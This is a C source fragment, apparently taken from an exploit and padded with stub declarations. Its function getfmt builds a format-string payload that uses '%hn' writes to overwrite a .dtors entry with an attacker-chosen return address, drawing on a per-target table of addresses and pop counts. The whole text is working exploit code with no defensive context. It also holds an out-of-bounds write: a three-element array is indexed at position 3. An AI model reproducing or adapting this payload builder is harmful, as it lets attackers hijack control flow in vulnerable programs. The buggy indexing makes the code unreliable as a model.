
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {unsigned int pops; int dtors_addr; int ret_addr; } ;


 scalar_t__ FMTSIZE ;
 scalar_t__ malloc (scalar_t__) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,int,scalar_t__) ;
 int printe (char*,int) ;
 size_t pt ;
 int sprintf (char*,char*,char,char,char,char,char,char,char,char,unsigned int,unsigned int,unsigned int,unsigned int) ;
 TYPE_1__* target ;

char *getfmt(int doff,int roff,unsigned int pop){
 unsigned int addrl,addrh;
 unsigned int pops=(pop?pop:target[pt].pops);
 unsigned long dtors=(target[pt].dtors_addr+doff);
 unsigned long addr=((target[pt].ret_addr+roff)-1);
 char *buf;
 char taddr[3];
 taddr[0]=(dtors&0xff000000)>>24;
 taddr[1]=(dtors&0x00ff0000)>>16;
 taddr[2]=(dtors&0x0000ff00)>>8;
 taddr[3]=(dtors&0x000000ff);
 addrh=(addr&0xffff0000)>>16;
 addrl=(addr&0x0000ffff);
 if(!(buf=(char *)malloc(FMTSIZE+1)))
  printe("getfmt(): allocating memory failed",1);
 memset(buf,0x0,(FMTSIZE+1));

 memcpy(buf,"\x00\x00\x00\x00\x00\x00\x00\x00\x03\x04"
 ,10);
 if(addrh<addrl)
  sprintf(buf+10,
  "%c%c%c%c%c%c%c%c"
  "%%.%dd%%%d$hn"
  "%%.%dd%%%d$hn",
  taddr[3]+2,taddr[2],taddr[1],taddr[0],
  taddr[3],taddr[2],taddr[1],taddr[0],
  (addrh-8),pops,(addrl-addrh),(pops+1));
 else
  sprintf(buf+10,
  "%c%c%c%c%c%c%c%c"
  "%%.%dd%%%d$hn"
  "%%.%dd%%%d$hn",
  taddr[3]+2,taddr[2],taddr[1],taddr[0],
  taddr[3],taddr[2],taddr[1],taddr[0],
  (addrl-8),(pops+1),(addrh-addrl),pops);
 return(buf);
}
